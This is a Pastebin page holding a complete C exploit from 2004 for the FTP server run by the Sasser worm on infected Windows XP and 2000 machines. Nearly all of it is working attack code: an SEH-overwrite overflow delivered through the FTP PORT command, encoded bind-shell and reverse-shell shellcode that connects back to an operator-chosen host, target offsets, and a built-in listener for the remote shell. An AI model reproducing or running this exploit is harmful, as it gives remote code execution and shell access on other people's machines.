Advertisement
FlyFar

sasser_ftpd

Jan 7th, 2023
1,021
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 8.14 KB | None | 0 0
  1. /*
  2.   _________ / ___// ____/ ____/
  3.  / ___/ __ \\__ \/ __/ / /
  4. / /  / /_/ /__/ / /___/ /___
  5. /_/   \____/____/_____/\____/
  6. - ROMANIAN SECURITY RESEARCH 2004 -
  7. sasser v[a-e] exploit (of its ftpd server)
  8. exploit version 1.4, public
  9. author:  mandragore
  10. date:  Mon May 10 16:13:31     2004
  11. vuln type: SEH ptr overwriting
  12. greets:  rosecurity team
  13. discovery: edcba
  14. note:  sasser.e has its ftpd on port 1023
  15. update:  offsets
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <strings.h>
  20. #include <signal.h>
  21. #include <netinet/in.h>
  22. #include <netdb.h>
  23.  
  24. #define NORM  "\033[00;00m"
  25. #define GREEN "\033[01;32m"
  26. #define YELL  "\033[01;33m"
  27. #define RED   "\033[01;31m"
  28.  
  29. #define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.4 for " RED
  30. "sasser.x" NORM
  31.  
  32. #define fatal(x) { perror(x); exit(1); }
  33.  
  34. #define default_port 5554
  35.  
  36. struct { char *os; long goreg; long gpa; long lla;}
  37. targets[] = {
  38. //  { "os", pop pop ret, GetProcAd ptr, LoadLib ptr },
  39.  { "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll's
  40.  { "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 },
  41.  { "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 },
  42. }, tsz;
  43.  
  44. unsigned char bsh[]={
  45. 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
  46. 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
  47. 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
  48. 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
  49. 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
  50. 0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
  51. 0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
  52. 0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
  53. 0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
  54. 0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
  55. 0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
  56. 0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
  57. 0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
  58. 0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
  59. 0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
  60. 0xC8,0x21,0x0E
  61. };
  62.  
  63. unsigned char rsh[]={
  64. 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
  65. 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
  66. 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
  67. 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
  68. 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
  69. 0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
  70. 0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
  71. 0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
  72. 0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
  73. 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
  74. 0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
  75. 0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
  76. 0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
  77. };
  78.  
  79. char verbose=0;
  80.  
  81. void setoff(long GPA, long LLA) {
  82. int gpa=GPA^0xdededede, lla=LLA^0xdededede;
  83. memcpy(bsh+0x1d,&gpa,4);
  84. memcpy(bsh+0x2e,&lla,4);
  85. memcpy(rsh+0x1d,&gpa,4);
  86. memcpy(rsh+0x2e,&lla,4);
  87. }
  88.  
  89. void usage(char *argv0) {
  90. int i;
  91.  
  92. printf("%s -d <host/ip> [opts]\n\n",argv0);
  93.  
  94. printf("Options:\n");
  95. printf(" -h undocumented\n");
  96. printf(" -p <port> to connect to [default: %u]\n",default_port);
  97. printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");
  98. printf(" -P <port> for the shellcode [default: 5300]\n");
  99. printf(" -H <host/ip> for the reverse shellcode\n");
  100. printf(" -L setup the listener for the reverse shell\n");
  101. printf(" -t <target type> [default 0]; choose below\n\n");
  102.  
  103. printf("Types:\n");
  104. for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)
  105.  printf(" %d %s\t[0x%.8x]\n", i, targets[i].os, targets[i].goreg);
  106.  
  107. exit(1);
  108. }
  109.  
  110. void shell(int s) {
  111. char buff[4096];
  112. int retval;
  113. fd_set fds;
  114.  
  115. printf("[+] connected!\n\n");
  116.  
  117. for (;;) {
  118.  FD_ZERO(&fds);
  119.  FD_SET(0,&fds);
  120.  FD_SET(s,&fds);
  121.  
  122.        if (select(s+1, &fds, NULL, NULL, NULL) < 0)
  123.   fatal("[-] shell.select()");
  124.  
  125.  if (FD_ISSET(0,&fds)) {
  126.   if ((retval = read(1,buff,4096)) < 1)
  127.    fatal("[-] shell.recv(stdin)");
  128.   send(s,buff,retval,0);
  129.  }
  130.  
  131.  if (FD_ISSET(s,&fds)) {
  132.   if ((retval = recv(s,buff,4096,0)) < 1)
  133.    fatal("[-] shell.recv(socket)");
  134.   write(1,buff,retval);
  135.  }
  136. }
  137. }
  138.  
  139. void callback(short port) {
  140. struct sockaddr_in sin;
  141. int s,slen=16;
  142.  
  143. sin.sin_family = 2;
  144. sin.sin_addr.s_addr = 0;
  145. sin.sin_port = htons(port);
  146.  
  147. s=socket(2,1,6);
  148.  
  149. if ( bind(s,(struct sockaddr *)&sin, 16) ) {
  150.  kill(getppid(),SIGKILL);
  151.  fatal("[-] shell.bind");
  152. }
  153.  
  154. listen(s,1);
  155.  
  156. s=accept(s,(struct sockaddr *)&sin,&slen);
  157.  
  158. shell(s);
  159. printf("crap\n");
  160. }
  161.  
  162. int main(int argc, char **argv, char **env) {
  163. struct sockaddr_in sin;
  164. struct hostent *he;
  165. char *host; int port=default_port;
  166. char *Host; int Port=5300; char bindopt=1;
  167. int i,s,pid=0,rip;
  168. char *buff;
  169. int type=0;
  170. char *jmp[]={"\xeb\x06","\xe9\x13\xfc\xff\xff"};
  171.  
  172. printf(BANNER "\n");
  173.  
  174. if (argc==1)
  175.  usage(argv[0]);
  176.  
  177. for (i=1;i<argc;i+=2) {
  178.  if (strlen(argv[i]) != 2)
  179.   usage(argv[0]);
  180.  
  181.  switch(argv[i][1]) {
  182.   case 't':
  183.    type=atoi(argv[i+1]);
  184.    break;
  185.   case 'd':
  186.    host=argv[i+1];
  187.    break;
  188.   case 'p':
  189.    port=atoi(argv[i+1])?:default_port;
  190.    break;
  191.   case 's':
  192.    if (strstr(argv[i+1],"rev"))
  193.     bindopt=0;
  194.    break;
  195.   case 'H':
  196.    Host=argv[i+1];
  197.    break;
  198.   case 'P':
  199.    Port=atoi(argv[i+1])?:5300;
  200.    Port=Port ^ 0xdede;
  201.    Port=(Port & 0xff) << 8 | Port >>8;
  202.    memcpy(bsh+0x57,&Port,2);
  203.    memcpy(rsh+0x5a,&Port,2);
  204.    Port=Port ^ 0xdede;
  205.    Port=(Port & 0xff) << 8 | Port >>8;
  206.    break;
  207.   case 'L':
  208.    pid++; i--;
  209.    break;
  210.   case 'v':
  211.    verbose++; i--;
  212.    break;
  213.   case 'h':
  214.    usage(argv[0]);
  215.   default:
  216.    usage(argv[0]);
  217.   }
  218. }
  219.  
  220. if (verbose)
  221.  printf("verbose!\n");
  222.  
  223. if ((he=gethostbyname(host))==NULL)
  224.  fatal("[-] gethostbyname()");
  225.  
  226. sin.sin_family = 2;
  227. sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
  228. sin.sin_port = htons(port);
  229.  
  230. printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr
  231. *)he->h_addr_list[0])),port);
  232. if (bindopt)
  233.  printf("[.] will try to put a bindshell on port %d.\n",Port);
  234. else {
  235.  if ((he=gethostbyname(Host))==NULL)
  236.   fatal("[-] gethostbyname() for -H");
  237.  rip=*((long *)he->h_addr_list[0]);
  238.  rip=rip^0xdededede;
  239.  memcpy(rsh+0x53,&rip,4);
  240.  if (pid) {
  241.   printf("[.] setting up a listener on port %d.\n",Port);
  242.   pid=fork();
  243.   switch (pid) { case 0: callback(Port); }
  244.  } else
  245.   printf("[.] you should have a listener on
  246. %s:%d.\n",inet_ntoa(*((struct in_addr
  247. *)he->h_addr_list[0])),Port);
  248. }
  249.  
  250. printf("[.] using type '%s'\n",targets[type].os);
  251.  
  252. // --------------------  core
  253.  
  254. s=socket(2,1,6);
  255.  
  256. if (connect(s,(struct sockaddr *)&sin,16)!=0) {
  257.  if (pid) kill(pid,SIGKILL);
  258.  fatal("[-] connect()");
  259. }
  260.  
  261. printf("[+] connected, sending exploit\n");
  262.  
  263. buff=(char *)malloc(4096);
  264. bzero(buff,4096);
  265.  
  266. sprintf(buff,"USER x\n");
  267. send(s,buff,strlen(buff),0);
  268. recv(s,buff,4095,0);
  269. sprintf(buff,"PASS x\n");
  270. send(s,buff,strlen(buff),0);
  271. recv(s,buff,4095,0);
  272.  
  273. memset(buff+0000,0x90,2000);
  274. strncpy(buff,"PORT ",5);
  275. strcat(buff,"\x0a");
  276. memcpy(buff+272,jmp[0],2);
  277. memcpy(buff+276,&targets[type].goreg,4);
  278. memcpy(buff+280,jmp[1],5);
  279.  
  280. setoff(targets[type].gpa, targets[type].lla);
  281.  
  282. if (bindopt)
  283.  memcpy(buff+300,&bsh,strlen(bsh));
  284. else
  285.  memcpy(buff+300,&rsh,strlen(rsh));
  286.  
  287. send(s,buff,strlen(buff),0);
  288.  
  289. free(buff);
  290.  
  291. close(s);
  292.  
  293. // --------------------  end of core
  294.  
  295. if (bindopt) {
  296.  sin.sin_port = htons(Port);
  297.  sleep(1);
  298.  s=socket(2,1,6);
  299.  if (connect(s,(struct sockaddr *)&sin,16)!=0)
  300.   fatal("[-] exploit most likely failed");
  301.  shell(s);
  302. }
  303.  
  304. if (pid) wait(&pid);
  305.  
  306. exit(0);
  307. }
Tags: sasser_ftpd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement